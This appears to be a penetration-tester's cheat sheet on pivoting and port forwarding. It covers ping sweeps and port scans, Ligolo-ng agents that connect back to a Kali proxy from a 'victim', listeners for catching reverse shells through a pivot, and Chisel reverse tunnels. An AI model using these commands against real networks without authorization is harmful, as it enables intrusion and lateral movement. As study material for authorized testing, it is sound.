Pivoting and Port Forwarding

Pivoting is to be able to move around inside a network.
Port forwarding allows remote access to a port over a network.

Enumeration

# Network info
ifconfig
route print
netstat -r
arp -a
nmap -sn 192.168.1.0/24

# Ping Sweep For Loop on Hosts
# Linux
for i in {1..255}; do (ping -c 1 192.168.1.${i} | grep "bytes from" &); done

# Windows
for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"

# PowerShell
1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.15.5.$($_) -quiet)"}

# Ping sweep twice to ensure the ARP cache gets built

# PS Port scan
1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("IP", $_)) "TCP port $_ is open"} 2>$null

Ligolo-ng

Releases · nicocha30/ligolo-ngGitHub

# Setting up the interface
ip tuntap add user $(whoami) mode tun ligolo && ip link set ligolo up

# Kali
./proxy -laddr 192.168.45.180:53 -selfcert

# Victim
./agent.exe -connect 192.168.45.180:53 -ignore-cert

# Ligolo Proxy Console
session: 1
ifconfig - 172.16.151.243/24

# Adding the Pivot Subnet to the Ligolo Console from Kali
ip route add 172.16.151.0/24 dev ligolo
ip route list

# From the correct ligolo session, start the tunnel
start


# Run a quick command just to verify that the tunnel is working
nxc smb 172.16.151.0/24

# Disable or delete the interface after use
ip link set ligolo down
ip tuntap del mode tun dev ligolo

Catching a revshell from pivoted network

# Machine2 can't reach Kali directly, so route through Machine1 using port forwarding
# Using 0.0.0.0 to avoid confusion
listener_add --addr 0.0.0.0:80 --to 0.0.0.0:80 --tcp
rlwrap nc -lvnp 80

listener_add --addr 0.0.0.0:443 --to 0.0.0.0:443 --tcp
python3 -m uploadserver 443
listener_list

Ligolo-ng Local Port Forwarding

# https://github.com/nicocha30/ligolo-ng/wiki/Localhost
# 240.0.0.1 will point to the machine where the agent is running
ip route add 240.0.0.1/32 dev ligolo
mysql -h 240.0.0.1 -u apache -p -P 3306

Ligolo-ng Multi Pivot

Chisel

Releases · jpillora/chiselGitHub

$ netstat -ano
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN off (0.00/0/0)

# https://github.com/jpillora/chisel/releases/download/v1.10.1/chisel_1.10.1_linux_amd64.gz
dpkg -i chisel_1.10.1_linux_amd64.deb
apt-get install -f

# Kali
./chisel_1.10.1_linux_amd64 server -p 1234 --reverse
2024/11/23 12:33:25 server: session#1: tun: proxy#R:8085=>8080: Listening

# Target
$ ./chisel_1.10.1_linux_amd64 client 192.168.45.206:1234 R:8085:127.0.0.1:8080
2024/11/23 17:33:27 client: Connecting to ws://192.168.45.206:1234
2024/11/23 17:33:27 client: Connected (Latency 44.970654ms)

# Visit target port
http://192.168.45.206:8085/login?from=%2F

SSH

PreviousEnumerating Services NextAD

Last updated 10 months ago